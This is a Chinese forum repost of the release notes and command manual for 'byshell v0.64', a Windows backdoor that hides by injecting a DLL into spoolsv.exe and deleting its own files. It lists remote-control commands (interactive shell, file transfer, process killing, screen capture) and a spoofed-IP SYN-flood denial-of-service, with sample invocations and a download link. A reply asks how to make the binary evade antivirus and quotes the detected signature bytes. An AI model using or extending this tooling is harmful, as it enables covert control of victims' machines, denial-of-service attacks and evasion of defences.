[转载]后门程序byshell064.rar
提交时间:2004-12-25提交用户:baiyuanfan
工具分类:后门程序
运行平台:Windows
工具大小:88603 Bytes
文件MD5 :2b6f7424ad15fb203dafe7a61cbd9d30
工具来源:原创
byshell v0.64
author:"by"
byshell v0.64,用户态实现无进程无DLL无硬盘文件无启动项的后门程序。利用线程注射DLL到系统进程,解除DLL映射并删除自身文件和启动项,关机时恢复。大量的借鉴和学习了农民的cmdbind2的思想,在这里对农民前辈无私共享的精神致以120分感谢。原代码和注释写的比较凌乱,和本人的不好的程序风格有关,望大家谅解:(目前利用用户自定义协议实现无端口。可以穿过一些防火墙,如天网。但网络稳定性大大不如0.63,并且不支持在同一台机器上同时安装客户和服务端进行调试,与XP SP2有冲突。这个版本还不是很稳定,大家帮我测试和修改。可能以后会改成无连接或端口复用的:)作者允许此软件及其源代码自由传播,但引用时应注明原出处。在联系作者并得到同意之前,不得将此软件改编或删选后用作商业用途,但可用作学习和私人用途。
本软件仅仅支持NT以上的Wind0wZ系统。第一次使用时,在服务端把ntboot.exe和ntboot.dll放在同一目录下,执行ntboot.exe -install,安装完成后安装文件可以删除。以后当服务端上网,byshell会注射到spoolsv.exe中,可以自行修改原码改变注射的进程名。
符号#是这个软件的命令提示符。目前支持的命令:
cmd 在此后跟你要执行的cmd命令,注意:只能执行一条单独的命令。仅仅支持NT以上的Wind0wZ系统。
eg. #cmddir c:\winnt
shell 输入此命令后,进入交互的远程cmd,直到键入endshell返回#提示符。仅仅支持NT以上的Wind0wZ系统。
endshell 从shell状态返回#提示符。
chpass 改变后门密码。默认为“by”。
eg. #chpass123456
byver 查看连接的服务端的版本,新旧版本的客户服务端间交互时,可能有严重的兼容性问题。
sysinfo 取得对方的基本系统信息。
pslist 对方进程列表。
pskill 杀死对方指定进程。在此后跟你要杀死的进程的PID(由pslist得到)。
eg. #pskill972
modlist 对方指定进程加载的所有DLL的列表。在此后跟你要查看的进程的PID(由pslist得到)。
eg. #modlist972
get 在此软件的连接上下载远程文件。命令格式:
get <tab键> 本地保存文件名 <tab键> 远程下载文件名
eg. #get c:\download\file.txt d:\sourcefile.txt
put 在此软件的连接上向远程上传文件。命令格式:
put <tab键> 远程保存文件名 <tab键> 本地上传文件名
eg. #put d:\receive\file.txt c:\sourcefile.txt
reboot 重启对方机器。
dettach 解除byshell的重启,下次重启就不会有byshell了。
screen 远程截屏到本地保存为c:\remotedesktop.bmp。查看此文件可监视远程屏幕。(似乎在0.63以后的版本不能使用,我不太明白原因,哪位高手如能指教非常感谢)
搞笑功能,开怀一笑:
popmsg 弹出信息框。
eg. #popmsghello,are you all right?
swapmouse 远程鼠标左右键交换。
storemouse 远程鼠标左右键复原。
警告:以下的SYN功能有一定的危险性,仅仅用做测试。如果用户非法使用此功能攻击合法站点,将自己承担全部法律后果。
SYN 使用服务端发起SYN洪水的拒绝服务攻击测试。
参数:SYN 测试对象 测试的分钟数 IP伪造类型(可选参数,0是完全伪造,1是C段伪造,2是不伪造,默认为0) 发包频率(默认100个休息1ms)攻击对象端口(可选参数,默认为80WWW端口) 使用的端口(可选参数,0是随机变化,默认为0)
如果选择了某个可选参数,那么在它左边的可选参数就必须被选择,在它右边的可选参数则可以忽略。
eg. #SYN 172.18.1.5 15
eg. #SYN 172.18.1.5 15 1
eg. #SYN 172.18.1.5 15 1 1000 445 12345
queryDOS 查询服务端SYN攻击测试的详细情况。
endDOS 强制结束服务端的SYN作业。
由于作者是初学者,水平有限,程序一定存在很多BUG。谢谢各位朋友、前辈指教:
华东师大软件学院04级 [email]baiyuanfan@163.com[/email]
特别感谢在我写这个小软件时给了我很大帮助的gxisone(谷夕),glacier(黄鑫)和xfocus.net的所有朋友,是他们的支持使我这个初学者能够克服困难和疑惑,最终完成这个程序。
>> 下载 <<
[url]http://www.xfocus.net/tools/200412/937.html[/url] 楼主啊,byshell那个东西怎么改免杀呢?我所说的免杀,是在VC里面生成的exe和dll文件直接免杀,不用汇编和加壳的那种
如果大家想到了什么好方法,一定要告诉我,我的QQ:215197215
KV定位的ntboot.exe的特征码是这个:
00401C0A 68 48614000 push byloader.00406148
00401C0F 68 58304000 push byloader.00403058
好BT哦
我忙了几天了,小幅度修改VC源码都会被杀,郁闷ing~
页:
[1]